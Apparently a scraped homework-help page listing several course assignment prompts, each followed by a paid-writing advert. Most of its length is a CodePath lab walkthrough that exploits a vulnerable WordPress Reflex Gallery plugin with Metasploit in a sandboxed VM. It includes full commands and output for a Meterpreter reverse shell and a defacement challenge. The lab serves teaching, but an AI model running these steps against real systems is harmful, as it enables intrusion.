Photoshop 11 assignment

Photoshop 11 assignment

Instructions: Find an old family photo to restore. Enhance the photo with at least five different elements that you’ve learned about Lessons 1-5 of the Part 2 Text. Then, create a magazine cover page using that photo with some creative idea behind it utilizing at least one other photo for a background. You will upload three photos minimum. The original family photo, background photo, and the final cover page.  Once this is completed, you will complete a minimum of a four page write up (not including the title page or reference page): 12 font Times New Roman, double-spaced paper in APA Style format describing the following: 1. Purpose of the magazine. You must identify a valid purpose as if this magazine will be published for the public. 2. Describe the tools used from Lesson 1 and any challenges or purpose identified. 3. Describe the tools applied from Lesson 2 and why it was selected. 4. Describe the layers applied from Lesson 3 and why it was selected. 5. Examine the differences, the benefits and the limitations of the different image file types. 6.    Discuss the purpose and usage of smart objects, layers, and vectors in editing, also differentiate between a raster image and a vector image; also detail the layer concepts of hiding, linking, and setting layer styles. 7.    Outline the different processes to enhance images including sharpness, color, contrast, hue, brightness, and resolution. 8.    Evaluate the image processing capabilities such as feathering, filtering, and burning. 9.    Describe the process for performing advanced selection using masks, channels, refine edge, and defringing. 10.    Detail the capabilities of Adobe Photoshop as a tool for editing and restoring digital images, also describe the process to enhance digital images by manipulating sharpness, color, contrast, hue, brightness, and resolution. Submission Instructions: Submit the original family photo, background photo, final cover page and write up in APA format in the assignment area. You may need to reduce the file size of the images if the file is over 25 MB. Do this by reducing the PPI for the image.

 

 

 

 

Below see topics of Lesson 1-6

 

 

Lesson 1: Creating Raster Images…………………………….. 1

Topic A: Draw with Brushes…………………………………………………… 2

Topic B: Create Gradients……………………………………………………. 16

Topic C: Apply Tool Presets………………………………………………….34

 

Lesson 2: Applying Vector Image Tools…………………….43

Topic A: Create Images with Vector Paths……………………………….44

Topic B: Apply the Shape Drawing Tools…………………………………61

Topic C: Work with Type………………………………………………………71

Topic D: Apply Type Special Effects………………………………………. 80

 

Lesson 3: Applying Advanced Layer Techniques…………89

Topic A: Modify Images with Masks………………………………………. 90

Topic B: Apply Special Effects by Using Filters………………………. 106

Topic C: Apply Special Effects to Layers……………………………….. 111

Topic D: Apply Smart Objects for Nondestructive Editing…………122

 

Lesson 4: Automating Tasks………………………………… 129

Topic A: Create and Apply Actions……………………………………….130

Topic B: Batch Process Files with Photoshop and Adobe Bridge…140

 

Lesson 5: Editing Video……………………………………………… 145

Topic A: Edit Video……………………………………………………………………. 146

Topic B: Add Graphics, Titles, and Animation to Video……………………. 155

 

Lesson 6: Setting Project Requirements………………………… 163

Topic A: Identify Purpose, Audience, and Audience Needs……………….. 164

Topic B: Adhere to Copyright Rules for Artwork, Graphics, and

Graphics Use………………………………………………………………………… 170

Topic C: Determine and Evaluate Project Management Tasks and

Responsibilities…………………………………………………………………….. 173

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Excel Worksheet assignment

Excel Worksheet assignment

A Skills Approach: Excel 2016 Chapter 3: Using Formulas and Functions

1 | Page Fix It 3.6 Last Updated 3/19/18

Fix It 3.6 In this project, you will correct function mistakes and other formula errors in a workbook designed for

planning a large party or event. Be sure to save your work often!

Skills needed to complete this project: • Checking Formulas for Errors

• Finding Errors Using Trace Precedents and Trace Dependents

• Displaying and Printing Formulas

• Creating Formulas Using Counting Functions

• Finding Minimum and Maximum Values

• Formatting Text Using Functions

• Using CONCAT to Combine Text

• Finding Data Using the VLOOKUP Function

• Using the Function Arguments Dialog to Enter Functions

• Using Formula AutoComplete to Enter Functions

• Calculating Averages

• Naming Ranges of Cells

• Working with Named Ranges

• Updating Named Ranges with the Name Manager

• Editing and Deleting Names with the Name Manager

• Using Date and Time Functions

• Using the Logical Function IF

• Creating Formulas Referencing Data from Other Worksheets

• Calculating Loan Payments Using the PMT Function

1. Open the start file EX2016-FixIt-3-6. The file will be renamed automatically to include your name.

Change the project file name if directed to do so by your instructor, and save it.

2. If the workbook opens in Protected View, click the Enable Editing button in the Message Bar at the top of the

workbook so you can modify it.

3. On the GuestList sheet, check all the formulas. Cells to check are filled with the light orange color. Most of

them need to be corrected. Use error checking as needed and/or display the formulas on-screen for easy

viewing.

a. In the Name Tag column, modify the formula to display the guest name in this format: BILL SMITH

Hint: There are multiple errors in this formula. Fix the formula in cell D10 and then copy it to the

other cells in the column.

b. Correct the function used in cell A3 to calculate the sum of the values in the NumAttending column.

c. Correct the function used in cell A4 to count the number of values in the Street column.

d. Correct the function used in cell A5 to count the number of blank cells in the NumAttending column.

e. Correct the function used in cell A6 to display the largest value in the NumAttending column.

f. Correct the function used in cell A7 to display the average value in the NumAttending column.

Step 1 Download start file

 

 

A Skills Approach: Excel 2016 Chapter 3: Using Formulas and Functions

2 | Page Fix It 3.6 Last Updated 3/19/18

4. On the Shopping List sheet, check all the formulas. Cells to check are filled with the light orange color. Most

of them need to be corrected. Many of the problems on this worksheet can be solved by creating named

ranges or using a name that already exists.

a. The formula in cell B2 uses the wrong function.

b. The formulas in cells A9:A23 reference a named range that doesn’t exist. There is more than one

correct way to fix this problem using the cell range A5:H18 on the Places to Shop worksheet. You can

create the named range referenced in the formulas, or you can change the function arguments to

reference the cell range instead.

c. The formula in cell H9 results in the correct value. However, the workbook author copied this

formula to the remaining cells in the column and those values are definitely not correct! Fix the

formula in cell H9 and copy it to cells H10:H23. Hint: Notice that cell H8 is named Tax.

5. If you’ve fixed the formulas in cells H9:H23 correctly, the formulas in cells I9:I23 and G5 should be

calculate properly now. However, the formulas in cells G2:G4 still have errors that need to be fixed. Hint:

Use error checking as needed and/or display the formulas on-screen for easy viewing.

a. Correct the function used in cell G2 to average value of the Cost column.

b. Correct the function used in cell G3 to display the largest value in the Cost column.

c. Correct the function used in cell G4 to display the smallest value in the Cost column.

6. On the Summary sheet, you will be entering all the formulas. Cells to complete are filled with the light

orange color. Hint: Use error checking as needed and/or display the formulas on-screen for easy viewing.

a. Cell B2 should use a function that will update the date to the current date every time the workbook is opened.

b. Cell B4 references a named range that doesn’t exist. It should reference cell A4 on the Guest List sheet.

You can create the named range or edit the formula to reference the cell instead.

c. Cell B5 references a named range that doesn’t exist. It should reference cell A3 on the Guest List sheet.

You can create the named range or edit the formula to reference the cell instead.

d. Cell B8 is missing the formula to calculate whether or not the total Cost with tax on the Shopping

List sheet + the total Cost for purchasing and mailing invitations on the Guest List sheet is greater than

the available cash. The cell should display yes or no.

e. Add a formula to cell B9 to calculate the amount to borrow (total Cost with tax on the Shopping

List sheet + the total Cost for purchasing and mailing invitations on the Guest List sheet – the cash

available) if the value in cell B8 is yes. If the value in cell B8 is not yes, the cell should display 0.

f. Add a formula to cell B12 to calculate the monthly loan payment based on the information in

cells B9:B11. Use a negative number for the Pv argument.

7. Save and close the workbook.

8. Upload and save your project file.

9. Submit project for grading.

Step 2 Upload & Save

Step 3 Grade my Project

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Budget Estimating assessment help

Budget Estimating assessment help

This assignment consists of 2 parts: questions about budget estimation and developing a budget.

Part 1 Questions (10 points)

Provide responses to the following questions

1.    You are providing a review of contractor bids for a component of your upcoming project.  What can be done to determine whether or not a vendor’s bid is reasonable?

2.    Describe the conditions for which parametric, analogous and bottom up estimation techniques work best, and provide 2 examples in support of each method.

3.    Why is a cost management plan important?  How does the plan benefit the project manager?

Part 2 Budget Estimating (30 points)

Using the same scenario from the previous unit on scheduling, create a time-phased budget for the following project.  Prepare a figure like Exhibit 10.9, CPT 4e, that illustrates the daily and cumulative costs for the resource-leveled project.

Assume the following hourly rates:

Alcides $45 / hr.

Joan $50 / hr.

Part 3 Budget Estimating (50 points)

You are the project manager for a process improvement project for Company XYZ.    Prepare a figure like Exhibit 10.9 that illustrates the weekly and cumulative costs for the resource-leveled project.

Hint: To accomplish this exercise, you’ll need to create a project schedule in MS Excel (or by hand), create resource assignments, assign costs to each resource, and assign the resources to each task.  Some resource leveling will be required.

In this project, you have 3 employees: Ann, Becky and Clive.  Each person is limited to the amount of time allocated to your project.  Ann and Becky are available 30 hours/week; Clive is available 20 hours/week.  There hourly rates are: Ann: $60/hour; Becky: $35/hour; and Clive: $50/hour.

Mechanics (10 points)

Part 1 responses should be presented in a question-response format.  Use Arial font with 11 point. There is no word limit.

Your Instructor will use Turn-it-in to ensure your paper is authentic work.  To avoid plagiarism, see the course home page for more information and use the Purdue Online Writing Lab to learn how to paraphrase, summarize and cite the references you use in all academic writing assignments.

Parts 2 and 3 Use MS Excel (MS Project is not acceptable) to create the budget estimate and present it similar to Exhibit 10.9.  Show intermediate steps (schedule, resource schedule assignments, resource-leveled schedule and any other elements needed to create the time-phased budget estimate.

It is expected that each part of this assignment have excellent mechanics (presentation, grammar and spelling) and exhibit the quality of work capable of a group of graduate students and working professionals. All sections of the document submitted must be readable at 100% magnification.

Your Instructor will use Turn-it-in to ensure your paper is authentic work.  To avoid plagiarism, see the course home page for more information and use the Purdue Online Writing Lab to learn how to paraphrase, summarize and cite the references you use in all academic writing assignments.

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Project Documentation assignment help

Project Documentation assignment help

Project implementation is arguably the most exciting stage of the project management process. It is during project implementation that project plans begin to come to life and assumptions are able to be tested and measured in real-life scenarios.

One of the outcomes of project implementation is a set of deliverables that typically includes a system diagram; a network diagram; a database design document, including an entity-relationship diagram, a data dictionary, and table definitions; a clearly articulated cybersecurity plan; and source code.

To complete this assignment, you will create:

  • A system diagram that shows, in graphic form, the components of your project.
    • Your system diagram should follow the system description you submitted in your Week 2 project plan (but may differ based on the research you have conducted since Week 2).
    • You may create your system diagram in Microsoft PowerPoint or a graphics program of your choice.
  • A network diagram that shows, in graphic form, the flow of data within your project.
    • Your network diagram should follow the network description you defined in the Week 2 project plan (but may differ based on the research you have conducted since Week 2).
    • You may create your network diagram in Microsoft PowerPoint or a graphics program of your choice.
  • A database design document, including an entity-relationship diagram, a data dictionary, and table definitions, representing all of the data that must be stored and maintained within the context of your project and how that data is organized.
  • A clearly articulated cybersecurity plan that explains how you plan to secure project data and processes.
  • Source code (may be partial) for at least one software application.
    • Your source code may be implemented in HTML/JavaScript, Java, C++, or another programming language.
  • A quality assurance and software test plan.
  • Download the Software Test Plan for an example of what information is typically included and how it is typically organized in a software test plan.
 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Disaster Recovery

Disaster Recovery

Graded Assignments may be found at the end of each chapter of the required textbook under the title “Real-World Exercises”. Each assignment is due between Monday to Sunday evening by 11:59 p.m. EST. of the respective week. Each student is to select one exercise (per module exercise) from the grouping as identified below. Provide documented evidence, in Moodle, of completion of the chosen exercise (i.e. provide answers to each of the stated questions). Detailed and significant scholarly answers will be allotted full point value. Incomplete, inaccurate, or inadequate answers will receive less than full credit depending on the answers provided. All submissions need to directed to the appropriate area within Moodle. Late submissions, hardcopy, or email submissions will not be accepted.

Module 1 Graded Assignment

From Chapter 1, page 37, Real World Exercise 1.1

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Nmap Report Assignment

3. Review the Lab 5 Nmap Scan Report that accompanies this lab.

4. Using the Lab 5 Nmap Scan Report, answer the following questions:

 What are the date and timestamp of the Nmap host scan?

 What is the total number of loaded scripts for scanning?

 A synchronize packet (SYN) stealth scan discovers all open ports on the targeted host.

How many ports are open on the targeted host for the SYN stealth scan at 13:36?

 Identify hosts, operating systems, services, applications, and open ports on devices from the Zenmap GUI (Nmap) scan report.

5. Review the Lab 5 Nessus Vulnerability Scan Report that accompanies this lab.

6. Using the Lab 5 Nessus Vulnerability Scan Reportanswer the following questions:

 How many hosts were scanned?

 What were the start and end times for each of the scans?

 How many total vulnerabilities were discovered for each host?

 How many of the vulnerabilities were critical, major, and minor software vulnerabilities?

7. On your local computer, open a new Internet browser window.

8. In the address box of your Internet browser, type the URL http://cve.mitre.org and press

Enter to open the Web site.

9. On the Web site, toward the top left of the screen, click the CVE List link.

10. Review the CVE List Main Page.

11. Define CVE.

12. On the right, under Items of Interestclick the Terminology link.

13. Review the definitions for vulnerability and exposure.

14. Define the terms vulnerability and exposure.

15. At the top right of the Web site, click the Search link.

 

16. In the Search box, type the words Microsoft® XP 2003 Service Pack 1 and click the Search button.

17. Describe some of the results you discover.

18. After viewing the results, conduct another search and this time, type the words Cisco ASA

5505 Security + and click the Search button.

19. Describe some of the search results.

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

WordLists homework

WordLists homework

Write a class in Java called WordLists that generates useful word lists for scrabble players using this list.
Your class should contain the following methods:
• WordLists(String fileName): a constructor that takes the name of the dictionary file as the only parameter.
• lengthN(int n): returns an array of words of length n.
• startsWith(int n, char firstLetter): returns an array of words of length n beginning with the letter firstLetter
• containsLetter(int n, char included): returns an array of words of length n containing the letter included but not beginning with it.
• vowelHeavy(int n, int m): returns an array of words of length n containing at least m vowels.
• multiLetter(int m, char included): returns an array of words with at least m occurrences of the letter included.
Write a test class for your WordLists class that tries these methods out and writes the word lists (the arrays of strings) to text files.

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Cyber Security: Kali Linux Lab homework

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 1/13

Last week, we started working with Vagrant and WPDistillery, running WordPress and Kali in separate VMs, and using the  wpscan  tool to probe an older version of WordPress for weaknesses…and exploit them. Hopefully, you were able to find some interesting exploits to understand how the types of vulnerabilities we looked at over the first six weeks, such as XSS and SQLI, actually work in the wild.

This is only the beginning, though. As proofs-of-concept, many specific web vulnerabilities like XSS only require a simple demonstration, such as a harmless javascript  alert  or some minor modification to an HTML page. Like a single link in a chain, they aren’t very interesting in isolation, but when combined with other links, these vulnerabilities can be wielded to great effect. Like martial arts students, we begin with the rudiments — simple moves, both attacks and blocks — before we can understand how these are combined into a repertoire of skills.

In practice, the offensive goal is usually achieving the highest level of access possible. The defensive goal is, if not to block the attack outright, to at least contain the damage by limiting the attacker’s access. Nobody plans for their user database to get stolen, but one still hashes and salts passwords anyway,

Week 8 Lab Exercises: WordPress vs. Kali, Round 2

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 2/13

because pwning happens. This week, we’re going to look at how specific exploits become full-blown attacks — and what can be done to stop them.

This week’s lab builds on the previous one in that we’ll be using the previous WP/Kali setup via Vagrant/VirtualBox. We’ll cover some of the same steps again, but refer to last week’s instructions if you need more of a refresher.

First, you’ll need to make sure you have the VirtualBox VMs setup in the same way as last week’s lab:

Running in VirtualBox Logged into desktop

Provisioned via Vagrant / WPDistillery Running version 4.2

If you are running a version other than 4.2 or if you break your WordPress server during an exploit, you can destroy the current WP instance and remove web content:

Linux and macOS

cd $HOME/WPDistillery vagrant destroy –force

Enter password for sudo if asked then delete WordPress content.

rm -rf public

Windows PowerShell (As Administrator)

cd $HOME\WPDistillery vagrant destroy –force Remove-Item -Recurse -Force .\public\

All Hosts

Edit  wpdistillery/config.yml  and change the following value:

# WordPress version wpversion: 4.2

Start it back up.

vagrant up

Saving Progress:  Whenever you need a break from hacking WordPress, you can gracefully shutdownWhenever you need a break from hacking WordPress, you can gracefully shutdown the server usingthe server using   vagrant halt . Whenever you wish to resume, use. Whenever you wish to resume, use   vagrant up   to start the server.to start the server. Make sure you are in the WPDistillery directory when entering the commandsMake sure you are in the WPDistillery directory when entering the commands (Hint:(Hint:   cd $HOME/WPDistillery ).).

Milestone 0: Preparing the Playing Field

Kali VM

WordPress VM

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 3/13

Before going further, shutdown the WordPress server usingBefore going further, shutdown the WordPress server using   vagrant halt   on the command line andon the command line and shutdown the Kali VM using either its own shutdown menu or through VirtualBox Manager.shutdown the Kali VM using either its own shutdown menu or through VirtualBox Manager.

There’s one more step required for this lab. Because VirtualBox places specific networking restrictions on VMs, we need to configure VirtualBox to allow communication between the Kali VM and the WordPress VM in order to execute a more sophisticated attack.

First, you need to determine the host-only adapter used by the WPDistillery VM. In the VirtualBox client, click one the WPDistillery VM so its information is displayed in the detail pain, and then look at the details under Network. Two adapters should be listed: one “NAT” and one “Host-Only Adapter” with a qualifier like  vboxnet0  — that is the host-only network in use, so make a note of it.

Next, you’ll need to setup a DHCP server for that network — this will allow automatic assignments of IP addresses. Go to the Host Network Manager in VirtualBox (via the File menu). When the Host Network Manager dialog comes up:

Bug Alerts:  Deleting and re-creating the host-only adapter during step 1 (below) is necessary in orderDeleting and re-creating the host-only adapter during step 1 (below) is necessary in order for Kali to pull an IP from the DHCP server later on. Otherwise DHCP will offer IPs in thefor Kali to pull an IP from the DHCP server later on. Otherwise DHCP will offer IPs in the 192.168.56.0/24 network instead of 192.168.33.0/24. On macOS you may have to re-apply changes192.168.56.0/24 network instead of 192.168.33.0/24. On macOS you may have to re-apply changes twice when setting up DHCP, double-check the numbers before closing the dialog.twice when setting up DHCP, double-check the numbers before closing the dialog.

1. Highlight the host-only network you indentified in the previous step and delete it and then re-create it, then click on the Properties button at the top of the dialog.

2. When the nested dialog appears, click on DHCP Server tab and set the following fields: ☑ Enable Server Server Address:  192.168.33.2 Server Mask:  255.255.255.0 Lower Address Bound:  192.168.33.100 Upper Address Bound:  192.168.33.200

Click Apply and Close to apply these changes and exit. Restart the WPDistillery VM using the command line ( vagrant up ) and confirm the WordPress site is still accessible via  wpdistillery.vm .

Now, back in the VirtualBox client, click on the Kali VM. If it is running, power it down (right-click on the VM, Close >> Power Off). Then in the Kali VM settings (right-click on the VM, Settings), add a second adapter pointing to the same host-only network:

1. Click on Network 2. Click on Adapter 2 and set the following fields:

☑ Enable Network Adapter Attached to:  Host-only Adapter Name: specify the host-only adapter modified in the previous step

3. Click OK 4. Start the Kali VM (right-click on the VM, Start >> Normal Start) 5. Open a terminal and run the following command to remove the default network profiles and reboot Kali

In Kali Terminal, run:  sudo rm /etc/NetworkManager/system-connections/* ; sudo reboot

Open a Hole

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 4/13

6. After Kali reboots, log back in and confirm that you have 3 interfaces output in Kali Terminal by opening a Terminal and running  ip addr :

lo (loopback) with IP address of 127.0.0.1 eth0 (NAT) with IP similar to 10.x.x.x eth1 (Host-only) with IP of 192.168.33.100

7. Verify connectivity to your WordPress server and the Internet from Kali. ping google.com ping wpdistillery.vm  or  ping 192.168.33.10

End the pings with  Ctrl  +  C

If the setup was successful, both Kali and WordPress should have access to 2 networks now. One is used for Internet access in order to facilitate downloading of WordPress plugins and Kali attack tools. The other network doesn’t have Internet access, but is only a network of the VM’s that are connected to it. This latter network is the one that’ll be used as a safe sandbox for practicing our exploits.

Our first victim is a WordPress plugin for displaying image galleries called Reflex Gallery.

1. In the WP admin console, go to Plugins -> Add New 2. Search for  reflex gallery  and you should see ReFlex Gallery » WordPress Photo Gallery 3. Click on the result but don’t install the plugin yet. Look at the Changelog tab for any critical security

issues that were patched and install the version just before it was patched. 4. On the right side of the dialog, where it lists the compatibility and installs data, click the WordPress.org

Plugin Page » link 5. You’ll be taken to the official WP plugin page. Click on the  Development  tab 6. Click Advanced View 7. Under Previous Versions, download the 3.1.3 zip file 8. In the WordPress admin console, go to Plugins -> Add New -> Upload Plugin, specify the zip file you

downloaded, then click Install Now 9. Go to admin console plugins page, find the plugin, and click Activate

Challenge: Beyond activating the plugin, you need to use it in a page or a post on the WP instance. Create a gallery and use it in a page before proceeding

Milestone 1: Opening an Attack Surface

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 5/13

The following steps should be run in the Kali VM’s Terminal emulator So we know the blog is accessible from the host OS and Kali VM at  wpdistillery.vm , which is simply a local IP aliased via the  /etc/hosts  file. Let’s re-run wpscan against the URL:

wpscan –url http://wpdistillery.vm –random-agent

The output should include the vulnerability associated with Reflex Gallery:

Arbitrary File Upload. Sounds promising. At this point, we could dig in, research the source code, come up with a carefully-crafted demonstration of the specific, underlying exploit. But instead of that, let’s just go right for the throat and attack this with a sledgehammer.

Metasploit is an exploitation framework. One of the most popular tools in Kali, it’s the free part of a larger, commercial project used widely in web security penetration testing. And by hackers. If wpscan is a dental pick, Metasploit is a set of carving knives.

Metasploit currently has over 1600 exploits, organized in different categories like:

Browser-based: a large collection of (mostly) remote code execution exploits Mobile: Android, iOS OS-specific: Linux, Windows, Solaris, etc. Combinations of the above

Metasploit currently has hundreds of payloads. Some of them are:

Command shells, enabling attackers to run scripts or arbitrary commands against a host Meterpreter payloads, enabling attackers to control the screen of a device using VNC and to browse, upload and download files Dynamic payloads, enabling attackers to evade anti-virus defenses by generating unique payloads

For this attack, we’ll be using Meterpreter to open a shell into the target machine. Read more about Meterpreter here

Metasploit uses a database to manage exploit/payload information and also attack data. So you need to initialize the DB, then load the console:

sudo service postgresql start sudo msfdb init msfconsole

[!] Title: Reflex Gallery <= 3.1.3 – Arbitrary File Upload Reference: https://wpvulndb.com/vulnerabilities/7867 Reference: http://packetstormsecurity.com/files/130845/ Reference: http://packetstormsecurity.com/files/131515/ Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4133 Reference: https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_ Reference: https://www.exploit-db.com/exploits/36374/ [i] Fixed in: 3.1.4

Milestone 2: Recon

Milestone 3: Hello, Metasploit

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 6/13

Fun fact: you get different ASCII art every time. And they say hackers don’t care about UX. Note the command prompt has changed to  msf5 > . You are now in a shell within another shell within a VM.

In the snippets below, the  >  character denotes the end of the prompt (similar to how  $  is used to denote a non-root user’s bash prompt). For example,  msf5 >  is the MSF prompt. The commands to enter will follow the  >  in most of the examples below.

First check that the DB is connected OK. The DB isn’t strictly necessary but MSF runs faster with it.

msf5 > db_status [*] Connected to msf. Connection type: postgresql.

Now we’re ready.

In MSF, start by searching the exploit database for something related to the plugin affected by the vulnerability. You could search on several different terms to find something, but in this case, the plugin has an unusual word in its name, “Reflex”

Enter  search Reflex  into MSF:

Well, that sure looks handy. It’s even ranked excellent, which should suggest to you that not all of these tools are created equal. Some work better than others; some don’t work at all. In fact, what follows may not work perfectly for you, so don’t be too surprised if it doesn’t go swimmingly. These are hacks, after all: user- supported code and scripts whose primary purpose is to compromise systems, so robustness isn’t exactly a guarantee. Give it a shot, but be prepared for some possible difficulty ahead.

The command to use the exploit is unsurprisingly called  use  and takes the exploit’s name as an argument. Once loaded, the command prompt changes again, and you can run the  info command.

msf5 > use exploit/unix/webapp/wp_reflexgallery_file_upload [*] No payload configured, defaulting to php/meterpreter/reverse_tcp msf5 exploit(wp_reflexgallery_file_upload) > info

Notice the output lists the affected version and some options we’ll need to set:

msf5 > search Reflex [!] Module database cache not built yet, using slow search

Matching Modules ================

Name Disclosure Date Rank Descriptio —- ————— —- ———– exploit/unix/webapp/wp_reflexgallery_file_upload 2012-12-30 excellent WordPress

Milestone 4: Pwnage

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 7/13

Use the  set  command to specify  RHOST  accordingly. If your blog isn’t hosted at the root ( / ), you could additionally pass in the path by setting  TARGETURI  (but the WpDistillery setup should work with the default).

msf5 exploit(wp_reflexgallery_file_upload) > set RHOST wpdistillery.vm RHOST => wpdistillery.vm

Before we can run the exploit, we need to specify the  LHOST  i.e. which IP address should Kali (localhost) receive a shell on. The default might be in the NAT network in which cause the exploit will work but no session will be opened. To ensure that we get a shell back on the host-only adapter’s IP address, we will set it explicitly.

msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LHOST 192.168.33.100 LHOST => 192.168.33.100

You can probably guess the command used to finally run the exploit (it’ll take a minute to run):

Available targets: Id Name — —- 0 Reflex Gallery 3.1.3

Check supported: Yes

Basic options: Name Current Setting Required Description —- ————— ——– ———– Proxies no A proxy chain of format type:host:port[,type:host:p RHOSTS yes The target host(s), range CIDR identifier, or hosts RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the wordpress application VHOST no HTTP server virtual host

Payload information:

Description: This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution.

msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > exploit

[*] Started reverse TCP handler on 192.168.33.100:4444 [+] Our payload is at: mcxgHJixsWZpS.php. Calling payload… [*] Calling payload… [*] Sending stage (38288 bytes) to 192.168.33.10 [*] Meterpreter session 1 opened (192.168.33.100:4444 -> 192.168.33.10:51778) at 2020-10-11 [+] Deleted mcxgHJixsWZpS.php

meterpreter >

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 8/13

Having problems? See the Troubleshooting section at the end of this milestone Notice the command prompt changed to  meterpreter > . The meterpreter payload ( mcxgHJixsWZpS.php ) was uploaded, executed, then deleted (just like campers, hackers should leave no trace), and now we have a connection to the target machine. Run the  shell  command when you see the  meterpreter >  prompt to load a new shell:

meterpreter > shell Process 5315 created. Channel 0 created.

A shell within a shell within a shell. But this shell is different; this shell is running on the WordPress VM. In case it’s not clear, you really shouldn’t be able to do that. Notice the new shell spawned by Meterpreter doesn’t bother with command prompts at all, so it might just look like nothing’s happening after the process and channel are created. Try running some commands, like  whoami and  pwd :

whoami www-data pwd /var/www/public/wp-content/uploads/2020/10 echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin exit meterpreter >

Lines 2, 4, and 6 in above snippet are output. It’s a low-fi shell, and somewhat limited, but it works, and it’s enough to compromise the whole machine. We can see we’re shell’d in as the  www-data  user and presently in one of the wordpress upload directories, which is where the malicious PHP payload was delivered.

The  exit  command on line 7 above gets us back to the  meterpreter >  prompt, which has fewer but more useable commands than the shell. For instance, we can poke around with  pwd ,  cd ,  ls , and  cat :

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 9/13

meterpreter > pwd /var/www/html/wp-content/uploads/2017/03 meterpreter > cd ../../.. meterpreter > pwd /var/www/html/wp-content meterpreter > ls Listing: /var/www/html/wp-content =================================

Mode Size Type Last modified Name —- —- —- ————- —- 100644/rw-r–r– 29 fil 2017-03-18 19:01:59 +0000 index.php 40755/rwxr-xr-x 4096 dir 2017-03-18 01:13:31 +0000 plugins 40755/rwxr-xr-x 4096 dir 2017-03-16 20:06:21 +0000 themes 40755/rwxr-xr-x 4096 dir 2017-03-18 01:13:31 +0000 upgrade 40755/rwxr-xr-x 4096 dir 2017-03-18 01:13:31 +0000 uploads

meterpreter > cat index.php <?php // Silence is golden.

Meterpreter may fail to establish a connection after running  exploit  in Metasploit. This might be a one- off error, but if you can’t get it to work, here are a few alternatives you can try:

The whole setup can be simplified by bypassing the Kali VM and simply installing Metasploit to your host machine and running the same instructions from within Metasploit on your host machine. We don’t recommend this approach unless the above doesn’t work for you, for the simple reason that it’s not a great idea to install hacking tools on to your host system. By having things like Metasploit and vulnerable WordPress versions contained within VMs, any risks can be compartmentalized and easily cleaned up. That said, there’s nothing especially dangerous about installing Metasploit to your host system, but if you do install it, we’d recommend you remove it after the course is done.

As an alternative workaround to the above that still uses the Kali VM, you can setup port-forwarding through localhost. In VirtualBox, stop your Kali VM, open its Settings, and under Network, disable Adapter 2 (as created in Milestone 0), then switch back to Adapter 1 and click Port Forwarding. Click the Add button at right and use the following settings:

Name:  metasploit Protocol:  TCP Host IP:  127.0.0.1 Host Port:  4444 Guest IP: (leave blank) Guest Port:  4444

Click OK and retstart Kali. Then, in Metasploit, load the exploit (via  use ), set  LHOST  to your host PC’s IP address (not the VM IP) and  LPORT  to  4444 , then try  exploit  again.

Troubleshooting

Milestone 5: Tag it

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 10/13

Challenge: Make a change to the WP content. You can open a  vi  editor from  meterpreter > using the  edit <file>  command. Use this to alter one of the PHP files in some subtle, tasteful way. For example:

Meterpreter Cheat Sheet

And that’s pretty much game over for this scenario. Once an attacker is able to gain this level of access, a whole universe of options suddenly opens up. If the machine is configured appropriately, those options may be limited, but this is not a position any sysadmin wants be in, even with everything configured perfectly. In the best case scenario, the attack surface available to the intruder is intolerably large.

Congratulations: at this point, you are officially a script kiddie. Hopefully this has given you a sense of the power of these tools, how even a single, specific exploit affecting some random plugin can be weaponized in a way that’s frighteningly easy to use. In the above example, we just compromised the whole system, so it’s tempting to feel like there’s some real skill involved in what we’re doing here. But we’re standing on the shoulders of giants. Just go back and read more about Meterpreter:

“…an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.”

Now writing something like that takes real skill. Remember, everything available in Kali has been used extensively by others. Many of these kinds of tools started out as someone’s secret weapon of choice and gradually filtered out into the public domain. That’s not to say Kali isn’t powerful or even dangerous (it is). But the most effective, advanced attacks and tools in use today certainly aren’t bundled in Kali.

